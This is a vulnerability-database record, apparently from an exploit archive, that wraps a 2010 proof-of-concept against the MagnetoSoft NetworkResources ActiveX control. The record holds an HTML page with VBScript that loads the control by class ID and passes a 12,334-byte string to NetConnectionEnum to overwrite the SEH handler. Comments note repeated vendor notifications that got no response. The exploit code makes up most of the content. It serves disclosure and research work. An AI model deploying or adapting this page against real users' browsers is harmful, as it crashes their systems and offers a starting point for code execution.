{"lastseen": "2020-04-01T19:04:29", "references": [], "description": "\nMagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)", "edition": 1, "reporter": "s4squatch", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2010-04-13T00:00:00", "title": "MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:29", "rev": 2}, "score": {"value": -0.6, "vector": "NONE", "modified": "2020-04-01T19:04:29", "rev": 2}, "vulnersScore": -0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-04-13T00:00:00", "id": "EXPLOITPACK:2D7BCD5F47030AF29EB52B195C310339", "href": "", "viewCount": 1, "sourceData": "<html>\n<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>\n<script language='vbscript'>\n'Magneto Software Net Resource ActiveX NetConnectionEnum SEH Overwrite POC\n'Discovered by: s4squatch\n'Site: www.securestate.com\n'Date Discovered: 02/11/10\n'www: http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm\n'Download: http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe\n'Vendor Notified: 02/02/10 --> NO RESPONSE\n'Vendor Notified: 02/11/10 --> NO RESPONSE\n'Vendor Notified: 02/17/10 --> NO RESPONSE\n'SKNetResource.ocx\n'Function NetConnectionEnum ( ByVal strServerName As String , ByVal strQualifier As String , ByRef pvarNetConnectionInfo As Variant ) As Long\n'progid = \"SKNETRESOURCELib.SKNetResource\"\n\n'SEH overwrite\nbuff = String(12334, \"A\")\n\narg1 = buff\narg2 = \"defaultV\"\narg3 = \"defaultV\"\ntarget.NetConnectionEnum arg1 ,arg2 ,arg3 \n\n</script>", "cvss": {"score": 0.0, "vector": "NONE"}}

{}